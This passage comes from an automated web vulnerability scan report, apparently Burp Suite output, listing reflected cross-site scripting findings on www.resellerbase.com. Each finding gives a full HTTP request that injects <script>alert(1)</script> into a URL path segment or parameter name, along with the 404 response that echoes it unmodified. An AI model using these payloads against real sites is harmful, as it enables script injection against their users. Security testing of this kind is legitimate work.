<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesaf56e<script>alert(1)</script>f052d75a5be/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.711. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dcca3<script>alert(1)</script>aee57651d09 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosdcca3<script>alert(1)</script>aee57651d09/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosdcca3<script>alert(1)</script>aee57651d09/images/ was not found on this server.</p>
...[SNIP]...

2.712. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98671<script>alert(1)</script>4cfe29be39c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images98671<script>alert(1)</script>4cfe29be39c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images98671<script>alert(1)</script>4cfe29be39c/ was not found on this server.</p>
...[SNIP]...

2.713. http://www.resellerbase.com/communication/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c2ff5<script>alert(1)</script>a6ad323614a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/?c2ff5<script>alert(1)</script>a6ad323614a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/?c2ff5<script>alert(1)</script>a6ad323614a=1 was not found on this server.</p>
...[SNIP]...

2.714. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6630<script>alert(1)</script>a807db9e4f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationb6630<script>alert(1)</script>a807db9e4f3/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationb6630<script>alert(1)</script>a807db9e4f3/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.715. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3640b<script>alert(1)</script>93e3e9440be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes3640b<script>alert(1)</script>93e3e9440be/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes3640b<script>alert(1)</script>93e3e9440be/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.716. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f2cd<script>alert(1)</script>900606f84fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos5f2cd<script>alert(1)</script>900606f84fc/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos5f2cd<script>alert(1)</script>900606f84fc/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.717. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c210a<script>alert(1)</script>be7096ec842 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagesc210a<script>alert(1)</script>be7096ec842/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagesc210a<script>alert(1)</script>be7096ec842/folder.gif was not found on this server.</p>
...[SNIP]...

2.718. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88053<script>alert(1)</script>9875842cd4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/folder.gif88053<script>alert(1)</script>9875842cd4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/folder.gif88053<script>alert(1)</script>9875842cd4 was not found on this server.</p>
...[SNIP]...

2.719. http://www.resellerbase.com/communication/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20c40<script>alert(1)</script>dcef60a7b8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/folder.gif?20c40<script>alert(1)</script>dcef60a7b8a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/folder.gif?20c40<script>alert(1)</script>dcef60a7b8a=1 was not found on this server.</p>
...[SNIP]...

2.720. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58d4f<script>alert(1)</script>e38b449724e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication58d4f<script>alert(1)</script>e38b449724e/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication58d4f<script>alert(1)</script>e38b449724e/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.721. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f5a6f<script>alert(1)</script>da2b24e53ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesf5a6f<script>alert(1)</script>da2b24e53ec/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf5a6f<script>alert(1)</script>da2b24e53ec/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.722. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3036<script>alert(1)</script>0fadd6db461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosb3036<script>alert(1)</script>0fadd6db461/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosb3036<script>alert(1)</script>0fadd6db461/images/rating/ was not found on this server.</p>
...[SNIP]...

2.723. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a6ec<script>alert(1)</script>3026ae867b9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images8a6ec<script>alert(1)</script>3026ae867b9/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images8a6ec<script>alert(1)</script>3026ae867b9/rating/ was not found on this server.</p>
...[SNIP]...

2.724. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 595e6<script>alert(1)</script>84bec1c88ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating595e6<script>alert(1)</script>84bec1c88ad/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating595e6<script>alert(1)</script>84bec1c88ad/ was not found on this server.</p>
...[SNIP]...

2.725. http://www.resellerbase.com/communication/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25dd6<script>alert(1)</script>d39083a4f8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/?25dd6<script>alert(1)</script>d39083a4f8f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/?25dd6<script>alert(1)</script>d39083a4f8f=1 was not found on this server.</p>
...[SNIP]...

2.726. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71663<script>alert(1)</script>53da57909ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication71663<script>alert(1)</script>53da57909ec/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication71663<script>alert(1)</script>53da57909ec/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.727. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f04f8<script>alert(1)</script>2e9739f1662 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesf04f8<script>alert(1)</script>2e9739f1662/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf04f8<script>alert(1)</script>2e9739f1662/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.728. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 348cd<script>alert(1)</script>0aa28241288 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos348cd<script>alert(1)</script>0aa28241288/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos348cd<script>alert(1)</script>0aa28241288/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.729. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d79ff<script>alert(1)</script>7fb277d05fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagesd79ff<script>alert(1)</script>7fb277d05fe/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagesd79ff<script>alert(1)</script>7fb277d05fe/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.730. http://www.resellerbase.com/communication/themes/kosmos/images/rating/2half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7a256<script>alert(1)</script>6cf8caed516 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating7a256<script>alert(1)</script>6cf8caed516/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
